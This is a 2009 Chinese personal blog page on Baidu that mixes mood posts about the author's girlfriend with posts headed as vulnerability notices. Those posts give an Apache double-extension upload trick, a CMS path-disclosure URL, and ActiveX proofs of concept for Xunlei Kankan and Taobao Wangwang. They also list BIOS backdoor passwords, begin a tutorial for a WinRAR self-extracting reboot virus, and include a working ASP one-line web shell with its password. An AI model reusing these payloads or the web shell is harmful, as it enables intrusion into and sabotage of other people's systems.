蓝雨's Blog
百度空间 | 百度首页 
 
个人档案
 
蓝⌒_⌒雨
男, 18岁
上次登录:
9小时前
加为好友
 
   
 
日历
 
     
 
文章分类
 
默认分类(13)
 
技术文章(22)
 
杂七杂八(51)
 
心情随笔(40)
 
电脑知识(20)
 
漏洞公告(21)
 
病毒公告(13)
 
系统维护(4)
 
外语知识(2)
 
休闲娱乐(31)
 
系统设置(9)
 
网络维护(1)
 
网络设置(2)
 
两只猪勒(0)
 
     
 
背景音乐
 
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
最近访客
 
 

馒头头子
如媚葵絮

消遣怪
谷歌超级管理

a466138870
qq498722144

qy1234578
夏树之恋
     
 
 
文章列表
 
Apache 畸形php文件名执行漏洞
2009-12-05 19:34

影响版本:
未知
漏洞描述:

创建类似于“*.php.*”,的文件名,如nuanyue.com.php.jpg
上传至服务器即可运行脚本。
测试脚本:
test-image.php.jpg


< ?php phpinfo();?>

经测试linux as 5 + php5+ Apache/2.2.3 有效

类别:漏洞公告 | 评论(0) | 浏览()
 
风讯网站内容管理系统爆路径漏洞
2009-11-23 19:06
风讯网站内容管理系统最新爆路径漏洞!

直接爆绝对路径

方法:
直接在URL后加上      Admin/User/getGroupDebate.asp即可!!

Microsoft VBScript 运行时错误 错误 '800a01f4'

阅读全文>>
类别:漏洞公告 | 评论(1) | 浏览()
 
雷看看 3.1.0 AvtiveX控件漏洞
2009-11-16 01:00
迅雷看看 <= 3.2.0.248漏洞描述:
<body>
<object classid="clsid:ACACC6EB-1FBA-4E13-A729-

53AEB2DF54F8"id="target">
</object>
<input onclick="on()" type="button" value="test"/>
<script language="javascript">
function on()
{alert(target.IsFileExist("c:\\boot.ini"))}
</script>
</body>
阅读全文>>
类别:漏洞公告 | 评论(0) | 浏览()
 
bios万能密码
2009-11-11 18:46

AWARD BIOS的万能密码如下:AWARD、AWARD_SW、Syxz、589589、589721、j322、j262、 j256、
SER、SKY_FOX、BIOSTAR、ALFAROME、lkwpeter、LKWPETER、aLLy、HLT、awkward、award、
h996、 wantgirl、eBBB、dirrid、awkard、abaubjao。
AMI BIOS的万能密码如下:AMI、BIOS、PASSWORD、HEWITT RAAND、AMI?、SW、AMI_SW、
LKWPEEEETER、A.M.I、Sysg。
注1:注意大小写。
注2:同一厂家的BIOS在不同时期的万能密码并不相同,所以此法不能保证绝对奏效,仅供娱乐

类别:休闲娱乐 | 评论(0) | 浏览()
 
十八岁勒猪
2009-11-05 18:54
一个十八岁勒猪到像不像一个十八岁勒猪!
类别:心情随笔 | 评论(0) | 浏览()
 
pig
2009-10-21 19:08
Steamed bun pig and Asako pig For a lifetime Forever No separate
类别:心情随笔 | 评论(2) | 浏览()
 
用WinRAR做无数次重启小病毒
2009-10-21 18:04

第一步

  1、新建一个空白rar文件然打开选择‘自解压格式’按钮(版本不同可能名称不同)在对话框中点击‘高级自解压选项’在‘常规’选项卡中的解压路径中输入:‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动’(本人使用的是XP系统,9x系统请输入相应的启动项)在‘解

阅读全文>>
类别:休闲娱乐 | 评论(0) | 浏览()
 
一个有意义的夜晚
2009-10-17 23:35

2009年10月16日晚上一个非常难忘而有意义的夜晚,我和我家馒头同台演出,虽然现已成为回忆但会永远保留就像我和我家馒头嘞感情一样要一直永远在一起

类别:心情随笔 | 评论(2) | 浏览()
 
一句话
2009-10-11 22:48

<%

if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if

%>


连接密码#

类别:默认分类 | 评论(0) | 浏览()
 
淘宝旺旺ActiveX控件拒绝服务漏洞POC
2009-10-08 11:18

<html>
<object classid='clsid:5D09DD40-CDC4-4C56-B615-0D1E3B357C2B' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\AliWangWang\AliIMX.dll"
prototype = "Sub ExecCmd ( ByVal strCmd As String )"
memberName = "Execmd"
progid     = "AliIMXLib.WangWangX"
argCount   = 1

arg1=String(3092, "A")

target.ExecC

阅读全文>>
类别:漏洞公告 | 评论(0) | 浏览()
 
更多文章>>
     


©2009 Baidu